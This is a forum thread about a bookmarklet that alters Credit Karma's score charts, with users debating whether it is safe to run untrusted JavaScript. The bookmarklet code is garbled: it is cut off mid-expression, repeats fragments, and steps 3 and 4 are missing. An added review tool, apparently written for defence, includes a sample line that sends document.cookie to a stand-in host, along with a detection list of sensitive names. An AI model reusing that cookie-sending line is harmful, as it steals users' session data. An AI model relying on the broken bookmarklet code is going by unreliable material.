Modifying Credit Karma for Verbose Charts

jmwha

New member
If you don't use Credit Karma, this probably won't interest you much. If you do, and you update your score frequently, you may have noticed that you can click on one of the monthly data points and see the individual credit scores you received each month.

It's clear the individual data points are there, and while I know that I'm not looking at a FICO score, that doesn't stop the data-geek in me from wanting more details. I've posted a similar script previously. On top of updating to Credit Karma's latest code, this version also displays the day of the month a score was received. For more info about the script and the changes I've made, see the notes at the bottom.

There are two possible ways to use this: create a bookmark, or run it manually from your browser's console.

Creating a bookmark:

  1. Create a new bookmark in your browser. You can either create a bookmark of a page and then edit it, or create a new blank bookmark.
  2. Copy this (hint: triple-click) and use it as your Location/URL:
Code:
javascript:{var ret=(function(a){a.fn.ckScoreHistory=function(b,c){var d=this.get(0),f=a(this).data("yaxismin")||null,e=a(this).data("yaxismax")||null,m=a(this).data("value"),j=a(this).data("scoretype"),n=[];if(!d)return!1;var q=CK.App.Common.TouchScreen.hasTouch,s=CK.App.Common.Charts.ScoreHistory.defaultSettings(m),r=10*Math.floor(s.seriesMin/10),y=10*Math.ceil(s.seriesMax/10),r=r-10>=f?r-10:r,y=y+10s.pointDiffThreshold/2?20:40>=x?5:10,D=v*s.numTicks,A=r+D=f&&y-D>=s.seriesMin&&y+v=f?r-10:r,y=y+10s.pointDiffThreshold/2?20:40>=x?5:10,D=v*s.numTicks,A=r+D=f&&y-D>=s.seriesMin&&y+v

5. Press enter.

6. Check out the charts.

Note: As Credit Karma changes their site, this method may, at some point, stop working altogether. It is up to them whether they do so in a way that intentionally makes this harder or only breaks it as necessary, while leaving an easy fix (or implement a variant of it, making it unnecessary).

Note: If you're inclined to check the differences in my script to ensure I am not acting maliciously, please compare it to lines 303-312 of the 'myfinances' script loaded via edgecastcdn. The primary change is the complete removal of the variable 'g' which is replaced with the existing variable 'm'. I've also changed one date format to increase the usefulness of the on-hover chart tooltip. Finally, I resize the window, triggering a refresh on any already-displayed charts. The two versions above vary slightly in how they're wrapped: the console version just prevents 'undefined' from appearing, whereas the bookmarklet version must start with 'javascript:' and scope multiple statements.
 
@resjudicata I can understand your concern. If someone else had done this and I stumbled across it, I would be hesitant to run it.

I've tried to be transparent about what I've done and how someone with some JavaScript knowledge could go about checking my work (which might be a bit easier with a JS beautifier and a diff utility).

I put a little time into this and would like to share my work with people who are interested in it. If you have suggestions about how I could do so more transparently, I'm open to them.

Caution is important, so I can understand why someone might not want to run this. I appreciate the "looks safe enough" classification, but would add that people should pay attention to whether posts have been edited.
 
@jmwha Sorry, I don't mean to disparage your work, or discourage people from using it. I just think that in general, we should not be encouraging end-users to run unknown JS code in their browsers.

There was a recent Facebook exploit that took this approach: http://www.neowin.net/news/new-facebook-exploit-hits-the-web

For anyone reading this, cjc343's code looks fine and is most likely safe to run. However, I am not a JS security expert and it's theoretically possible that cjc343 is a devilishly clever hacker who has hidden something malicious in safe-looking code.
 
@resjudicata To be clear, I didn't take your post as disparaging my work. You brought up a legitimate concern and Reddit will sometimes take a legitimate concern and blow it out of proportion, especially if the OP doesn't address the concern. Unfortunately, it's not a concern I can or have addressed, because any attempt by myself to address it suffers from the same trust concerns.

While I could do things like provide beautified versions and diffs of Credit Karma's code and mine, that still relies on trusting me to have faithfully provided each. I opted not to do so because anyone who is able to compare them should be beautifying and diffing the code themselves.
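
The review discussed in this thread (beautify the site's script and the shared one, then diff them) can also be done at the token level, which suits single-line minified files. This is an added example, not part of the original thread and not Credit Karma's or the poster's code; the three source strings and the `SENSITIVE` name list are constructed assumptions that only mirror the kinds of change the post describes.

```javascript
// Added example. All three sources are constructed samples, not Credit Karma's code.
const ORIGINAL = 'var g=a(this).data("value"),m=g;chart.draw(g,"MMM yyyy");';
const MODIFIED = 'var m=a(this).data("value");chart.draw(m,"MMM d, yyyy");a(window).resize();';
const TAMPERED = MODIFIED + 'new Image().src="https://collector.invalid/?c="+document.cookie;';

// Names worth a second look when they appear only in the modified copy (assumed list).
const SENSITIVE = new Set(["eval", "Function", "fetch", "XMLHttpRequest", "WebSocket",
  "sendBeacon", "cookie", "localStorage", "sessionStorage", "src", "innerHTML", "atob"]);

// Coarse tokenizer: string literals, identifiers, numbers, then single punctuation chars.
function tokenize(src) {
  return src.match(/"(?:\\.|[^"\\])*"|'(?:\\.|[^'\\])*'|[A-Za-z_$][\w$]*|\d+(?:\.\d+)?|\S/g) || [];
}

// Longest-common-subsequence diff over tokens, so minified one-line files compare cleanly.
function diffTokens(a, b) {
  const lcs = Array.from({ length: a.length + 1 }, () => new Array(b.length + 1).fill(0));
  for (let i = a.length - 1; i >= 0; i--) {
    for (let j = b.length - 1; j >= 0; j--) {
      lcs[i][j] = a[i] === b[j] ? lcs[i + 1][j + 1] + 1 : Math.max(lcs[i + 1][j], lcs[i][j + 1]);
    }
  }
  const removed = [], added = [];
  let i = 0, j = 0;
  while (i < a.length && j < b.length) {
    if (a[i] === b[j]) { i++; j++; }
    else if (lcs[i + 1][j] >= lcs[i][j + 1]) removed.push(a[i++]);
    else added.push(b[j++]);
  }
  while (i < a.length) removed.push(a[i++]);
  while (j < b.length) added.push(b[j++]);
  return { removed, added };
}

// Diff the site's copy against the shared copy and flag sensitive names among the additions.
function review(original, modified) {
  const { removed, added } = diffTokens(tokenize(original), tokenize(modified));
  const flagged = [...new Set(added.filter((t) => SENSITIVE.has(t)))];
  return { removed, added, flagged };
}

for (const [name, src] of [["modified", MODIFIED], ["tampered", TAMPERED]]) {
  const r = review(ORIGINAL, src);
  console.log(name, "added:", r.added.join(" "), "| flagged:", r.flagged.join(", ") || "none");
}
```

The flag list only points to where to start reading; the full `added` list is what has to be reviewed, and both inputs should be fetched by the reviewer rather than taken from the person sharing the script.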
 
